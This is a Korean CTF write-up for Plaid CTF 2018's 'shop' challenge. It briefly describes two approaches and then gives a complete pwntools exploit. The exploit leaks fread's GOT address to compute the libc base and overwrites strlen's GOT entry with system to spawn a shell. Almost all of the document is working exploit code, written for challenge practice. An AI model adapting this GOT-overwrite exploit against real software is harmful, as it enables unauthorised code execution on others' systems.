[Plaid CTF 2018] shop python solve code 1

1. got영역에서 preItem 이 null이 되게하는 곳(Item갯수가 무려 35개가 되게할수가 있다.)

거기서부터 fread까지 덮어쓰고, fread다음에 있는 strlen의 값을 system함수의 주소로 덮어쓰는 코드

2. 이것말고 shopname을 주소를 bss영역으로 덮고 rename을 통해서 

bss영역을 덮어쓰면서 다시 shopname주소를 memmem의 got값으로 덮어써서 memmem got의 값을 변경시키는 코드도 있다. 

일단 전자.

#!/usr/bin/env python
from pwn import *
import string
 
lib  = ELF("/lib/x86_64-linux-gnu/libc.so.6")
#lib  = ELF("./libc.so.6")
elf = ELF("./shop")
conn = process("./shop")
 
def AddItem(item, description="nothing", price="1"):
    conn.sendlineafter("> ","a")
    conn.sendline(item)
    conn.sendline(description)
    conn.sendline(price)
 
def CheckoutAllItem(item_IDs):
    conn.sendline("c")
    conn.sendline(item_IDs)
    result = conn.recvuntil("TOTAL: $")
    total = conn.recvuntil(".")
    
    return (result, total[:-1])
    
def ListItem():
    conn.sendlineafter("> ", "l")
    list = conn.recvuntil("> ")
    return list
    
def RenameShop(name):
    conn.sendline("n")
    conn.sendlineafter('Enter your shop name:', name)
 
def MakeALL_2byte_ItemIDs(k, n):
    """
    de Bruijn sequence for alphabet k
    and subsequences of length n.
    https://en.wikipedia.org/wiki/De_Bruijn_sequence
    """
    try:
        # let's see if k can be cast to an integer;
        # if so, make our alphabet a list
        _ = int(k)
        alphabet = list(map(str, range(k)))
    except (ValueError, TypeError):
        alphabet = k
        k = len(k)
    a = [0] * k * n
    sequence = []
    def db(t, p):
        if t > n:
            if n % p == 0:
                sequence.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)
    db(1, 1)
    return "".join(alphabet[i] for i in sequence)
    
    
conn.sendlineafter('Enter your shop name:', "myria")
 
for i in range(0,33):
    AddItem(str(i))
 
"""
All_ItemIDs = MakeALL_2byte_ItemIDs("0123456789abcdef", 4)
All_ItemIDs = All_ItemIDs[:65540]
"""
All_ItemIDs = cyclic(0x10000, alphabet='0123456789abcdef', n=4)
 
result, total = CheckoutAllItem(All_ItemIDs)
log.info("Checkout : %s" % total)
 
### fread leak!
fread_got = elf.got["fread"]
log.info("fread.got : 0x%x" % fread_got)
RenameShop(p64(fread_got-44))
 
leak = ListItem().split("\n")[-2].split(" - ")[1]
leak = leak+"\x00"*(8-len(leak))
fread_addr = u64(leak)
 
fread_offset = lib.symbols['fread']
strlen_offset = lib.symbols['strlen']
printf_offset = lib.symbols['printf']
fgets_offset = lib.symbols['fgets']
memmem_offset = lib.symbols['memmem']
system_offset = lib.symbols['system']
 
base_addr = fread_addr - fread_offset
strlen_addr = base_addr + strlen_offset
printf_addr = base_addr + printf_offset
fgets_addr = base_addr + fgets_offset
memmem_addr = base_addr + memmem_offset
system_addr = base_addr + 0x046590
 
log.info("%9s : 0x%x" % ("base_addr", base_addr))
log.info("%9s : 0x%x" % ("fread",fread_addr))
log.info("%9s : 0x%x" % ("strlen",strlen_addr))
log.info("%9s : 0x%x" % ("printf",printf_addr))
log.info("%9s : 0x%x" % ("fgets",fgets_addr))
log.info("%9s : 0x%x" % ("memmem",memmem_addr))
log.info("%9s : 0x%x" % ("system",system_addr))
print("")
 
### _preItem Null, RandomID leak
pre_preItemIsNull_Item=0x602008
RenameShop(p64((pre_preItemIsNull_Item+8)-44))
 
leak = ListItem().split("\n")[-2].split(" - ")[1]
leak = leak+"\x00"*(8-len(leak))
pre_preItemIsNull_Item_ID = u64(leak)
log.info("preItemIsNull_Item+8(ID) : 0x%x" % pre_preItemIsNull_Item_ID)
print("")
 
#malloc 
RenameShop(p64(pre_preItemIsNull_Item)+"@@@@"+"A")
LastItemID = p64(pre_preItemIsNull_Item_ID)[:4]
 
result, total = CheckoutAllItem(All_ItemIDs[4:]+LastItemID)
log.info("Checkout : %s" % total)
print(result)
 
exploit  = "\x00"*(fread_got-pre_preItemIsNull_Item)
exploit += p64(fread_addr)
exploit += p64(system_addr)
 
RenameShop(exploit)
conn.sendline("sh;")
conn.interactive()